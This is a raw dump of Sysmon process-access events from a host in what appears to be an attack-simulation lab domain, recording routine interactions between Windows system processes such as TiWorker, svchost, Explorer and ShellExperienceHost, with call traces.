System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.976{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPC
RT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\
Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 